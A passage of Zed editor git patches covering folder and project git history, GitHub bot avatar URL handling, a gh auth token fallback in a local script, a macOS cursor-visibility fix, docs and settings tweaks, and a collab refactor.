colors; contrast adjustment must still apply. + assert!(!TerminalElement::is_app_chosen_exact_color( + &Color::Indexed(0) + )); + assert!(!TerminalElement::is_app_chosen_exact_color( + &Color::Indexed(15) + )); + + // Boundary: index 16 is the first entry of the 6x6x6 cube — application-chosen. + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 16 + ))); + // Interior of the cube. + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 17 + ))); + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 231 + ))); + // Grayscale ramp boundaries. + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 232 + ))); + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Indexed( + 255 + ))); + + // 24-bit true color is always application-chosen. + assert!(TerminalElement::is_app_chosen_exact_color(&Color::Spec( + Rgb { + r: 10, + g: 20, + b: 30 + } + ))); + + // Named colors are theme-defined and must go through contrast adjustment. + assert!(!TerminalElement::is_app_chosen_exact_color(&Color::Named( + NamedColor::Red + ))); + assert!(!TerminalElement::is_app_chosen_exact_color(&Color::Named( + NamedColor::Foreground + ))); + } + #[test] fn test_contrast_adjustment_logic() { // Test the core contrast adjustment logic without needing full app context From c55078fba9684044f3194a82b77cd017445c6098 Mon Sep 17 00:00:00 2001 From: robert7k Date: Thu, 30 Apr 2026 16:11:47 +0200 Subject: [PATCH 121/231] Add git log / history for folders and whole project (#52634) Allows using the "View history" functionality also on folders and the project root, and not only on files. Renamed "View file history" to "View history" in the context menu to make it consistent. project_history Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Added git history for folders and whole project --------- Co-authored-by: Anthony Eid --- crates/git/src/git.rs | 2 +- crates/git/src/repository.rs | 12 ++--- crates/git_graph/src/git_graph.rs | 61 ++++++++++++----------- crates/project_panel/src/project_panel.rs | 15 +++--- 4 files changed, 47 insertions(+), 43 deletions(-) diff --git a/crates/git/src/git.rs b/crates/git/src/git.rs index d5274d24b513c8..cc3fbe1e2590cb 100644 --- a/crates/git/src/git.rs +++ b/crates/git/src/git.rs @@ -47,7 +47,7 @@ actions!( /// Shows git blame information for the current file. #[action(deprecated_aliases = ["editor::ToggleGitBlame"])] Blame, - /// Shows the git history for the current file. + /// Shows the git history for the selected file, folder, or project. FileHistory, /// Stages the current file. StageFile, diff --git a/crates/git/src/repository.rs b/crates/git/src/repository.rs index 3e5e14b310b6ae..69910d706e40b7 100644 --- a/crates/git/src/repository.rs +++ b/crates/git/src/repository.rs @@ -721,7 +721,7 @@ pub enum LogSource { All, Branch(SharedString), Sha(Oid), - File(RepoPath), + Path(RepoPath), } impl LogSource { @@ -732,7 +732,7 @@ impl LogSource { LogSource::Sha(oid) => { str::from_utf8(oid.as_bytes()).context("Failed to build str from sha") } - LogSource::File(_) => Ok("--follow"), + LogSource::Path(_) => Ok("--follow"), } } } @@ -2954,8 +2954,8 @@ impl GitRepository for RealGitRepository { log_source.get_arg()?, ]; - if let LogSource::File(file_path) = &log_source { - git_log_command.extend(["--", file_path.as_unix_str()]); + if let LogSource::Path(path) = &log_source { + git_log_command.extend(["--", path.as_unix_str()]); } let mut command = git.build_command(&git_log_command); @@ -3040,8 +3040,8 @@ impl GitRepository for RealGitRepository { args.push("--grep"); args.push(search_args.query.as_str()); - if let LogSource::File(file_path) = &log_source { - args.extend(["--", file_path.as_unix_str()]); + if let LogSource::Path(path) = &log_source { + args.extend(["--", path.as_unix_str()]); } let mut command = git.build_command(&args); diff --git a/crates/git_graph/src/git_graph.rs b/crates/git_graph/src/git_graph.rs index e98e635c1411f3..e92204c5f12fd0 100644 --- a/crates/git_graph/src/git_graph.rs +++ b/crates/git_graph/src/git_graph.rs @@ -834,20 +834,25 @@ fn resolve_file_history_target( ) -> Option<(RepositoryId, LogSource)> { if let Some(panel) = workspace.panel::(cx) && panel.read(cx).focus_handle(cx).contains_focused(window, cx) - && let Some(project_path) = panel.read(cx).selected_file_project_path(cx) + && let Some(project_path) = panel.read(cx).selected_entry_project_path(cx) { let git_store = workspace.project().read(cx).git_store(); let (repo, repo_path) = git_store .read(cx) .repository_and_path_for_project_path(&project_path, cx)?; - return Some((repo.read(cx).id, LogSource::File(repo_path))); + let log_source = if repo_path.is_empty() { + LogSource::All + } else { + LogSource::Path(repo_path) + }; + return Some((repo.read(cx).id, log_source)); } if let Some(panel) = workspace.panel::(cx) && panel.read(cx).focus_handle(cx).contains_focused(window, cx) && let Some((repository, repo_path)) = panel.read(cx).selected_file_history_target() { - return Some((repository.read(cx).id, LogSource::File(repo_path))); + return Some((repository.read(cx).id, LogSource::Path(repo_path))); } let editor = workspace.active_item_as::(cx)?; @@ -864,7 +869,7 @@ fn resolve_file_history_target( let (repo, repo_path) = git_store .read(cx) .repository_and_path_for_project_path(&project_path, cx)?; - Some((repo.read(cx).id, LogSource::File(repo_path))) + Some((repo.read(cx).id, LogSource::Path(repo_path))) } fn open_or_reuse_graph( @@ -1027,9 +1032,9 @@ impl GitGraph { .read(cx) .preview_fractions(window.rem_size()); - let is_file_history = matches!(self.log_source, LogSource::File(_)); - let graph_fraction = if is_file_history { 0.0 } else { fractions[0] }; - let offset = if is_file_history { 0 } else { 1 }; + let is_path_history = matches!(self.log_source, LogSource::Path(_)); + let graph_fraction = if is_path_history { 0.0 } else { fractions[0] }; + let offset = if is_path_history { 0 } else { 1 }; [ graph_fraction, @@ -1107,7 +1112,7 @@ impl GitGraph { let table_interaction_state = cx.new(|cx| TableInteractionState::new(cx)); - let column_widths = if matches!(log_source, LogSource::File(_)) { + let column_widths = if matches!(log_source, LogSource::Path(_)) { cx.new(|_cx| { RedistributableColumnsState::new( 4, @@ -2738,7 +2743,7 @@ impl Render for GitGraph { this.child(self.render_loading_spinner(cx)) }) } else { - let is_file_history = matches!(self.log_source, LogSource::File(_)); + let is_path_history = matches!(self.log_source, LogSource::Path(_)); let header_resize_info = HeaderResizeInfo::from_redistributable(&self.column_widths, cx); let header_context = TableRenderContext::for_column_widths( @@ -2766,7 +2771,7 @@ impl Render for GitGraph { .flex() .flex_col() .child(render_table_header( - if !is_file_history { + if !is_path_history { TableRow::from_vec( vec![ Label::new("Graph") @@ -2897,7 +2902,7 @@ impl Render for GitGraph { .child( h_flex() .size_full() - .when(!is_file_history, |this| { + .when(!is_path_history, |this| { this.child( div() .w(DefiniteLength::Fraction(graph_fraction)) @@ -3015,20 +3020,20 @@ impl Item for GitGraph { .file_name() .map(|name| name.to_string_lossy().to_string()) }); - let file_history_path = match &self.log_source { - LogSource::File(path) => Some(path.as_unix_str().to_string()), + let path_history_path = match &self.log_source { + LogSource::Path(path) => Some(path.as_unix_str().to_string()), _ => None, }; Some(TabTooltipContent::Custom(Box::new(Tooltip::element({ move |_, _| { v_flex() - .child(Label::new(if file_history_path.is_some() { - "File History" + .child(Label::new(if path_history_path.is_some() { + "Path History" } else { "Git Graph" })) - .when_some(file_history_path.clone(), |this, path| { + .when_some(path_history_path.clone(), |this, path| { this.child(Label::new(path).color(Color::Muted).size(LabelSize::Small)) }) .when_some(repo_name.clone(), |this, name| { @@ -3040,7 +3045,7 @@ impl Item for GitGraph { } fn tab_content_text(&self, _detail: usize, cx: &App) -> SharedString { - if let LogSource::File(path) = &self.log_source { + if let LogSource::Path(path) = &self.log_source { return path .as_ref() .file_name() @@ -3286,7 +3291,7 @@ mod persistence { pub const LOG_SOURCE_ALL: i32 = 0; pub const LOG_SOURCE_BRANCH: i32 = 1; pub const LOG_SOURCE_SHA: i32 = 2; - pub const LOG_SOURCE_FILE: i32 = 3; + pub const LOG_SOURCE_PATH: i32 = 3; pub const LOG_ORDER_DATE: i32 = 0; pub const LOG_ORDER_TOPO: i32 = 1; @@ -3298,7 +3303,7 @@ mod persistence { LogSource::All => LOG_SOURCE_ALL, LogSource::Branch(_) => LOG_SOURCE_BRANCH, LogSource::Sha(_) => LOG_SOURCE_SHA, - LogSource::File(_) => LOG_SOURCE_FILE, + LogSource::Path(_) => LOG_SOURCE_PATH, } } @@ -3307,7 +3312,7 @@ mod persistence { LogSource::All => None, LogSource::Branch(branch) => Some(branch.to_string()), LogSource::Sha(oid) => Some(oid.to_string()), - LogSource::File(path) => Some(path.as_unix_str().to_string()), + LogSource::Path(path) => Some(path.as_unix_str().to_string()), } } @@ -3334,11 +3339,11 @@ mod persistence { .and_then(|v| Oid::from_str(v).ok()) .map(LogSource::Sha) .unwrap_or_default(), - Some(LOG_SOURCE_FILE) => state + Some(LOG_SOURCE_PATH) => state .log_source_value .as_ref() .and_then(|v| RepoPath::new(v).ok()) - .map(LogSource::File) + .map(LogSource::Path) .unwrap_or_default(), None | Some(_) => LogSource::default(), } @@ -4432,7 +4437,7 @@ mod tests { assert_eq!(graphs.len(), 1); assert_eq!( graphs[0].read(cx).log_source, - LogSource::File(tracked1_repo_path.clone()) + LogSource::Path(tracked1_repo_path.clone()) ); }); @@ -4460,7 +4465,7 @@ mod tests { assert_eq!(graphs.len(), 1); assert_eq!( graphs[0].read(cx).log_source, - LogSource::File(tracked1_repo_path.clone()) + LogSource::Path(tracked1_repo_path.clone()) ); }); @@ -4540,7 +4545,7 @@ mod tests { .expect("expected a git graph"); assert_eq!( latest.read(cx).log_source, - LogSource::File(tracked2_repo_path) + LogSource::Path(tracked2_repo_path) ); }); } @@ -4549,11 +4554,11 @@ mod tests { fn test_serialized_state_roundtrip(_cx: &mut TestAppContext) { use persistence::SerializedGitGraphState; - let file_path = RepoPath::new(&"src/main.rs").unwrap(); + let path = RepoPath::new(&"src/main.rs").unwrap(); let sha = Oid::from_bytes(&[0xab; 20]).unwrap(); let state = SerializedGitGraphState { - log_source_type: Some(persistence::LOG_SOURCE_FILE), + log_source_type: Some(persistence::LOG_SOURCE_PATH), log_source_value: Some("src/main.rs".to_string()), log_order: Some(persistence::LOG_ORDER_TOPO), selected_sha: Some(sha.to_string()), @@ -4563,7 +4568,7 @@ mod tests { assert_eq!( persistence::deserialize_log_source(&state), - LogSource::File(file_path) + LogSource::Path(path) ); assert!(matches!( persistence::deserialize_log_order(&state), diff --git a/crates/project_panel/src/project_panel.rs b/crates/project_panel/src/project_panel.rs index ba6779e3e8b504..1ae5f424845075 100644 --- a/crates/project_panel/src/project_panel.rs +++ b/crates/project_panel/src/project_panel.rs @@ -1053,7 +1053,7 @@ impl ProjectPanel { || (settings.hide_root && visible_worktrees_count == 1)); let should_show_compare = !is_dir && self.file_abs_paths_to_diff(cx).is_some(); - let (has_git_repo, has_file_history) = { + let (has_git_repo, has_history) = { let project_path = project::ProjectPath { worktree_id, path: entry.path.clone(), @@ -1062,12 +1062,11 @@ impl ProjectPanel { let has_git_repo = git_store .repository_and_path_for_project_path(&project_path, cx) .is_some(); - let has_file_history = !is_dir - && has_git_repo + let has_history = has_git_repo && !git_store .project_path_git_status(&project_path, cx) .is_some_and(|status| status.is_created()); - (has_git_repo, has_file_history) + (has_git_repo, has_history) }; let has_pasteable_content = self.has_pasteable_content(cx); @@ -1143,8 +1142,8 @@ impl ProjectPanel { ) }) .action("Add to .gitignore", Box::new(git::AddToGitignore)) - .when(has_file_history, |menu| { - menu.action("View File History", Box::new(git::FileHistory)) + .when(has_history, |menu| { + menu.action("View History", Box::new(git::FileHistory)) }) }) .when(!should_hide_rename, |menu| { @@ -3791,11 +3790,11 @@ impl ProjectPanel { Some((worktree.read(cx), entry)) } - pub fn selected_file_project_path(&self, cx: &App) -> Option { + pub fn selected_entry_project_path(&self, cx: &App) -> Option { let (worktree, entry) = self.selected_sub_entry(cx)?; Some(ProjectPath { worktree_id: worktree.read(cx).id(), - path: entry.is_file().then(|| entry.path.clone())?, + path: entry.path.clone(), }) } From 2458f2f2c4f345f5420c14716860769bae931c2b Mon Sep 17 00:00:00 2001 From: tsutoringo <33830878+tsutoringo@users.noreply.github.com> Date: Thu, 30 Apr 2026 23:17:32 +0900 Subject: [PATCH 122/231] Fix GitHub bot avatar URL (#55297) ## Summary - Fix GitHub avatar URL generation for bot noreply commit authors - Fall back to the GitHub commit author API when the CDN email avatar endpoint cannot resolve bot noreply emails - Add tests covering bot noreply and regular user noreply author emails - Before image - After image ## Test Plan - `cargo test -p git_hosting_providers --features gpui/test-support` Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - Fixed GitHub avatar lookup for bot noreply commit authors. --------- Co-authored-by: Christopher Biscardi --- .../src/providers/github.rs | 43 +++++++++++++++++-- 1 file changed, 40 insertions(+), 3 deletions(-) diff --git a/crates/git_hosting_providers/src/providers/github.rs b/crates/git_hosting_providers/src/providers/github.rs index 23aff64de93b89..df3637c49d2389 100644 --- a/crates/git_hosting_providers/src/providers/github.rs +++ b/crates/git_hosting_providers/src/providers/github.rs @@ -68,8 +68,12 @@ pub struct Github { base_url: Url, } +fn normalize_author_email(email: &str) -> &str { + email.trim_start_matches('<').trim_end_matches('>') +} + fn build_cdn_avatar_url(email: &str) -> Result { - let email = email.trim_start_matches('<').trim_end_matches('>'); + let email = normalize_author_email(email); Url::parse(&format!( "https://avatars.githubusercontent.com/u/e?email={}&s=128", encode(email) @@ -77,6 +81,15 @@ fn build_cdn_avatar_url(email: &str) -> Result { .context("failed to construct avatar URL") } +fn build_cdn_avatar_url_for_author_email(email: &str) -> Result> { + let email = normalize_author_email(email); + if email.ends_with("[bot]@users.noreply.github.com") { + return Ok(None); + } + + build_cdn_avatar_url(email).map(Some) +} + impl Github { pub fn new(name: impl Into, base_url: Url) -> Self { Self { @@ -267,8 +280,10 @@ impl GitHostingProvider for Github { author_email: Option, http_client: Arc, ) -> Result> { - if let Some(email) = author_email { - return Ok(Some(build_cdn_avatar_url(&email)?)); + if let Some(email) = author_email + && let Some(avatar_url) = build_cdn_avatar_url_for_author_email(&email)? + { + return Ok(Some(avatar_url)); } let commit = commit.to_string(); @@ -629,4 +644,26 @@ mod tests { "https://avatars.githubusercontent.com/u/e?email=user%2Btag%40example.com&s=128" ); } + + #[test] + fn test_build_cdn_avatar_url_for_author_email_skips_bot_noreply_emails() { + for email in [ + "41898282+github-actions[bot]@users.noreply.github.com", + "<41898282+github-actions[bot]@users.noreply.github.com>", + ] { + assert_eq!(build_cdn_avatar_url_for_author_email(email).unwrap(), None); + } + } + + #[test] + fn test_build_cdn_avatar_url_for_author_email_uses_user_noreply_emails() { + let url = build_cdn_avatar_url_for_author_email("12345+octocat@users.noreply.github.com") + .unwrap() + .unwrap(); + + assert_eq!( + url.as_str(), + "https://avatars.githubusercontent.com/u/e?email=12345%2Boctocat%40users.noreply.github.com&s=128" + ); + } } From 95ae6cc19bac45e2b5c888032bafa71f4256cb50 Mon Sep 17 00:00:00 2001 From: "Joseph T. Lyons" Date: Thu, 30 Apr 2026 10:19:13 -0400 Subject: [PATCH 123/231] Add gh auth token fallback to top ranking issues script (#55028) This just allows me to switch from using tokens to `gh` when running this script locally. Release Notes: - N/A --- script/update_top_ranking_issues/main.py | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/script/update_top_ranking_issues/main.py b/script/update_top_ranking_issues/main.py index 0b71d0bb86425b..717f1394300d96 100644 --- a/script/update_top_ranking_issues/main.py +++ b/script/update_top_ranking_issues/main.py @@ -1,4 +1,5 @@ import os +import subprocess from datetime import date, datetime, timedelta from typing import Any, Optional @@ -39,9 +40,15 @@ def main( # but we can place it in our env when running the script locally, for convenience token = github_token or os.getenv("GITHUB_ACCESS_TOKEN") if not token: - raise typer.BadParameter( - "GitHub token is required. Pass --github-token or set GITHUB_ACCESS_TOKEN env var." - ) + try: + result = subprocess.run( + ["gh", "auth", "token"], capture_output=True, text=True, check=True + ) + token = result.stdout.strip() + except (subprocess.CalledProcessError, FileNotFoundError): + raise typer.BadParameter( + "GitHub token is required. Pass --github-token, set GITHUB_ACCESS_TOKEN env var, or log in with `gh auth login`." + ) headers = { "Authorization": f"token {token}", From 93fb4665a97118b2a9d2025184a7e11081645878 Mon Sep 17 00:00:00 2001 From: Agus Zubiaga Date: Thu, 30 Apr 2026 16:19:27 +0200 Subject: [PATCH 124/231] Fix cursor style changes across windows (#55323) We were storing a cursor hidden boolean in the window state, but that state is actually global to the application. Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- crates/gpui_macos/src/platform.rs | 23 +++++++++--- crates/gpui_macos/src/window.rs | 62 ++++++++++++++++++++++++------- 2 files changed, 66 insertions(+), 19 deletions(-) diff --git a/crates/gpui_macos/src/platform.rs b/crates/gpui_macos/src/platform.rs index fa37597065fb17..fefe957bb25bad 100644 --- a/crates/gpui_macos/src/platform.rs +++ b/crates/gpui_macos/src/platform.rs @@ -52,7 +52,7 @@ use std::{ ptr, rc::Rc, slice, str, - sync::{Arc, OnceLock}, + sync::{Arc, OnceLock, atomic::AtomicBool}, }; use util::{ ResultExt, @@ -179,6 +179,7 @@ pub(crate) struct MacPlatformState { dock_menu: Option, menus: Option>, keyboard_mapper: Rc, + cursor_hidden: Arc, } impl MacPlatform { @@ -215,6 +216,7 @@ impl MacPlatform { on_thermal_state_change: None, menus: None, keyboard_mapper, + cursor_hidden: Arc::new(AtomicBool::new(false)), })) } @@ -619,12 +621,22 @@ impl Platform for MacPlatform { handle: AnyWindowHandle, options: WindowParams, ) -> Result> { - let renderer_context = self.0.lock().renderer_context.clone(); + let (cursor_hidden, foreground_executor, background_executor, renderer_context) = { + let guard = self.0.lock(); + ( + guard.cursor_hidden.clone(), + guard.foreground_executor.clone(), + guard.background_executor.clone(), + guard.renderer_context.clone(), + ) + }; + Ok(Box::new(MacWindow::open( handle, options, - self.foreground_executor(), - self.background_executor(), + cursor_hidden, + foreground_executor, + background_executor, renderer_context, ))) } @@ -979,8 +991,9 @@ impl Platform for MacPlatform { /// Match cursor style to one of the styles available /// in macOS's [NSCursor](https://developer.apple.com/documentation/appkit/nscursor). fn set_cursor_style(&self, style: CursorStyle) { + let cursor_hidden = self.0.lock().cursor_hidden.clone(); unsafe { - set_active_window_cursor_style(style); + set_active_window_cursor_style(style, &cursor_hidden); } } diff --git a/crates/gpui_macos/src/window.rs b/crates/gpui_macos/src/window.rs index c4c47c4f542468..2ab4b52d8d8ace 100644 --- a/crates/gpui_macos/src/window.rs +++ b/crates/gpui_macos/src/window.rs @@ -324,17 +324,34 @@ pub(crate) fn convert_mouse_position(position: NSPoint, window_height: Pixels) - /// This function is not thread safe. Callers must ensure this is called on the AppKit main /// thread because it reads the active AppKit window and updates GPUI window state associated /// with Objective-C objects. -pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { +pub(crate) unsafe fn set_active_window_cursor_style( + style: CursorStyle, + cursor_hidden: &AtomicBool, +) { // SAFETY: The caller guarantees AppKit main-thread access. The class check ensures the // window has our WINDOW_STATE_IVAR before reading it. unsafe { let app = NSApplication::sharedApplication(nil); + let key_window: id = msg_send![app, keyWindow]; let main_window: id = msg_send![app, mainWindow]; - if main_window.is_null() || !msg_send![main_window, isKindOfClass: WINDOW_CLASS] { + let active_window = if !key_window.is_null() + && msg_send![key_window, isKindOfClass: WINDOW_CLASS] + { + Some(key_window) + } else if !main_window.is_null() && msg_send![main_window, isKindOfClass: WINDOW_CLASS] { + Some(main_window) + } else { + None + }; + + let Some(active_window) = active_window else { + if !matches!(style, CursorStyle::None) { + unhide_cursor(cursor_hidden); + } return; - } + }; - let window_state = get_window_state(&*main_window); + let window_state = get_window_state(&*active_window); let mut window_state = window_state.lock(); if window_state.cursor_style != style { window_state.cursor_style = style; @@ -346,6 +363,22 @@ pub(crate) unsafe fn set_active_window_cursor_style(style: CursorStyle) { } } +/// Unhides the cursor if this GPUI platform instance has hidden it. +/// +/// # Safety +/// +/// Must be called on the AppKit main thread. +unsafe fn unhide_cursor(cursor_hidden: &AtomicBool) { + unsafe { + if cursor_hidden + .compare_exchange(true, false, Ordering::Relaxed, Ordering::Relaxed) + .is_ok() + { + let _: () = msg_send![class!(NSCursor), unhide]; + } + } +} + unsafe fn build_window_class(name: &'static str, superclass: &Class) -> *const Class { unsafe { let mut decl = ClassDecl::new(name, superclass).unwrap(); @@ -463,7 +496,7 @@ struct MacWindowState { blurred_view: Option, background_appearance: WindowBackgroundAppearance, cursor_style: CursorStyle, - cursor_hidden: bool, + cursor_hidden: Arc, display_link: Option, renderer: renderer::Renderer, request_frame_callback: Option>, @@ -665,6 +698,7 @@ impl MacWindow { tabbing_identifier, .. }: WindowParams, + cursor_hidden: Arc, foreground_executor: ForegroundExecutor, background_executor: BackgroundExecutor, renderer_context: renderer::Context, @@ -782,7 +816,7 @@ impl MacWindow { blurred_view: None, background_appearance: WindowBackgroundAppearance::Opaque, cursor_style: CursorStyle::Arrow, - cursor_hidden: false, + cursor_hidden, display_link: None, renderer: renderer::new_renderer( renderer_context, @@ -1820,18 +1854,21 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { let cursor_hidden; { - let mut window_state = window_state.lock(); + let window_state = window_state.lock(); if matches!(window_state.cursor_style, CursorStyle::None) { - if !window_state.cursor_hidden { + if window_state + .cursor_hidden + .compare_exchange(false, true, Ordering::Relaxed, Ordering::Relaxed) + .is_ok() + { let _: () = msg_send![class!(NSCursor), hide]; - window_state.cursor_hidden = true; } return; } cursor_style = window_state.cursor_style; - cursor_hidden = window_state.cursor_hidden; + cursor_hidden = window_state.cursor_hidden.clone(); }; let cursor: id = match cursor_style { @@ -1871,10 +1908,7 @@ extern "C" fn reset_cursor_rects(this: &Object, _: Sel) { CursorStyle::None => unreachable!(), }; - if cursor_hidden { - let _: () = msg_send![class!(NSCursor), unhide]; - window_state.lock().cursor_hidden = false; - } + unhide_cursor(&cursor_hidden); let bounds = NSView::bounds(this as *const Object as id); let _: () = msg_send![this, addCursorRect: bounds cursor: cursor]; From ad86df6cf3a2e298c20d210cc9f713f6e48de603 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mar=C3=ADa=20Craig?= Date: Thu, 30 Apr 2026 16:58:11 +0200 Subject: [PATCH 125/231] docs: Clarify search_web tool availability for Zed Pro (#55329) Adds a note to the `search_web` tool entry in the AI tools docs clarifying that the built-in tool is only available to Zed Pro subscribers, and pointing free-plan users to MCP servers as an alternative. Release Notes: - N/A --- docs/src/ai/tools.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/docs/src/ai/tools.md b/docs/src/ai/tools.md index 3ada0ce025976a..627a905899006a 100644 --- a/docs/src/ai/tools.md +++ b/docs/src/ai/tools.md @@ -63,6 +63,8 @@ Searches the web for information, providing results with snippets and links from **Example:** Looking up whether a known bug in a dependency has been patched in a recent release, or finding the current API signature for a third-party library when the local docs are out of date. +> **Note:** The built-in `search_web` tool is only available to [Zed Pro](https://zed.dev/pricing) subscribers using the Zed provider. If you're on a free plan or using a different provider, you can get equivalent functionality by connecting an MCP server that provides web search capabilities. See [MCP servers](./mcp.md) for details. + ## Edit Tools ### `copy_path` From aecadc743844503894b37bb68de9efabd3e5d4e3 Mon Sep 17 00:00:00 2001 From: Danilo Leal <67129314+danilo-leal@users.noreply.github.com> Date: Thu, 30 Apr 2026 13:11:06 -0300 Subject: [PATCH 126/231] title_bar: Display subfolders in the project button (#54796) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Follow up to https://github.com/zed-industries/zed/pull/54406. Closes https://github.com/zed-industries/zed/issues/54782. In the PR linked above, we made the label that's displayed in the project button be always the repository name. However, if you're opening up a subfolder of that repository as the main-root of a given project/workspace, we wouldn't display that anymore. This PR fixes that by _still_ displaying the repo name, but the subfolder, too, in the titlebar: Screenshot 2026-04-24 at 4  52@2x Release Notes: - Fixed a bug where we don't display subfolders of a repository in the title bar's project button. --- crates/title_bar/src/title_bar.rs | 21 ++++++++++++++++++--- 1 file changed, 18 insertions(+), 3 deletions(-) diff --git a/crates/title_bar/src/title_bar.rs b/crates/title_bar/src/title_bar.rs index 02a0c1bcf78129..c6f82adcdf01d1 100644 --- a/crates/title_bar/src/title_bar.rs +++ b/crates/title_bar/src/title_bar.rs @@ -190,8 +190,9 @@ impl Render for TitleBar { let mut linked_worktree_name = None; if let Some(worktree) = self.effective_active_worktree(cx) { repository = self.get_repository_for_worktree(&worktree, cx); - let worktree = worktree.read(cx); + let worktree_abs_path = worktree.read(cx).abs_path(); project_name = worktree + .read(cx) .root_name() .file_name() .map(|name| SharedString::from(name.to_string())); @@ -210,14 +211,28 @@ impl Render for TitleBar { .then_some(project_name.clone()) .flatten() }); + let identity = repo_identity_path(&repo.common_dir_abs_path); + let display_name = if identity.extension() == Some(std::ffi::OsStr::new("git")) { identity.file_stem() } else { identity.file_name() }; - if let Some(name) = display_name.and_then(|n| n.to_str()) { - project_name = Some(name.into()); + + if let Some(repo_name) = display_name.and_then(|n| n.to_str()) { + let name = if let Ok(relative) = + worktree_abs_path.strip_prefix(&*repo.work_directory_abs_path) + { + if relative.as_os_str().is_empty() { + repo_name.to_string() + } else { + format!("{}/{}", repo_name, relative.display()) + } + } else { + repo_name.to_string() + }; + project_name = Some(SharedString::from(name)); } } } From 48f90b3c1392553ce57254b689cd8a84bbe5999e Mon Sep 17 00:00:00 2001 From: Candido Sales Gomes Date: Fri, 1 May 2026 05:19:19 -0400 Subject: [PATCH 127/231] Disable fuzzy-ruby-server by default in Ruby language servers (#55215) ## Summary Add `!fuzzy-ruby-server` to the Ruby language servers list in the default settings so it is opt-in rather than enabled for all users by default. This is a prerequisite for merging the Fuzzy Ruby Server support in the Ruby extension: https://github.com/zed-extensions/ruby/pull/283 As requested by @vitallium in the review comment: https://github.com/zed-extensions/ruby/pull/283\#issuecomment-4294888519 ## Change ```diff - "language_servers": ["solargraph", "!ruby-lsp", "!rubocop", "!sorbet", "!steep", "!kanayago", "..."], + "language_servers": ["solargraph", "!ruby-lsp", "!rubocop", "!sorbet", "!steep", "!kanayago", "!fuzzy-ruby-server", "..."], ``` Release Notes: - Disabled `fuzzy-ruby-server` by default for Ruby files. --------- Co-authored-by: Marshall Bowers --- assets/settings/default.json | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/assets/settings/default.json b/assets/settings/default.json index c0ec7b74f5abbf..d2bec7226627e2 100644 --- a/assets/settings/default.json +++ b/assets/settings/default.json @@ -2255,7 +2255,16 @@ "language_servers": ["basedpyright", "ruff", "!ty", "!pyrefly", "!pyright", "!pylsp", "..."], }, "Ruby": { - "language_servers": ["solargraph", "!ruby-lsp", "!rubocop", "!sorbet", "!steep", "!kanayago", "..."], + "language_servers": [ + "solargraph", + "!ruby-lsp", + "!rubocop", + "!sorbet", + "!steep", + "!kanayago", + "!fuzzy-ruby-server", + "...", + ], }, "Rust": { "debuggers": ["CodeLLDB"], From 7ea9ac8a6a7e7651613fb0ec9819b2ca614b2313 Mon Sep 17 00:00:00 2001 From: Marshall Bowers Date: Fri, 1 May 2026 19:28:57 +0200 Subject: [PATCH 128/231] collab: Decouple session principal from `User` database model (#55440) This PR decouples the session principal in Collab from the `User` database model. We have introduced a new `User` domain entity that we use for the principal. Currently we just construct it from the database model, but this separation will make it easier to remove reliance on reading the database directly soon. Release Notes: - N/A --- crates/collab/src/auth.rs | 2 +- crates/collab/src/db.rs | 1 - crates/collab/src/db/queries/users.rs | 19 +++++++++++++------ crates/collab/src/db/tables/user.rs | 11 +++++++++++ crates/collab/src/entities.rs | 3 +++ crates/collab/src/entities/user.rs | 9 +++++++++ crates/collab/src/lib.rs | 1 + crates/collab/src/rpc.rs | 3 ++- .../collab/tests/integration/test_server.rs | 2 +- 9 files changed, 41 insertions(+), 10 deletions(-) create mode 100644 crates/collab/src/entities.rs create mode 100644 crates/collab/src/entities/user.rs diff --git a/crates/collab/src/auth.rs b/crates/collab/src/auth.rs index 5cd377d605b1d5..629d93388dd9d5 100644 --- a/crates/collab/src/auth.rs +++ b/crates/collab/src/auth.rs @@ -74,7 +74,7 @@ pub async fn validate_header(mut req: Request, next: Next) -> impl Into .await? .with_context(|| format!("user {user_id} not found"))?; - req.extensions_mut().insert(Principal::User(user)); + req.extensions_mut().insert(Principal::User(user.into())); return Ok::<_, Error>(next.run(req).await); } diff --git a/crates/collab/src/db.rs b/crates/collab/src/db.rs index b3a943bef44904..10c4f7c961f152 100644 --- a/crates/collab/src/db.rs +++ b/crates/collab/src/db.rs @@ -37,7 +37,6 @@ use worktree_settings_file::LocalSettingsKind; pub use ids::*; pub use sea_orm::ConnectOptions; -pub use tables::user::Model as User; pub use tables::*; #[cfg(feature = "test-support")] diff --git a/crates/collab/src/db/queries/users.rs b/crates/collab/src/db/queries/users.rs index 96771ecba541b4..ceb23d535e9d42 100644 --- a/crates/collab/src/db/queries/users.rs +++ b/crates/collab/src/db/queries/users.rs @@ -60,7 +60,10 @@ impl Database { } /// Returns a user by GitHub login. There are no access checks here, so this should only be used internally. - pub async fn get_user_by_github_login(&self, github_login: &str) -> Result> { + pub async fn get_user_by_github_login( + &self, + github_login: &str, + ) -> Result> { self.transaction(|tx| async move { Ok(user::Entity::find() .filter(user::Column::GithubLogin.eq(github_login)) @@ -78,7 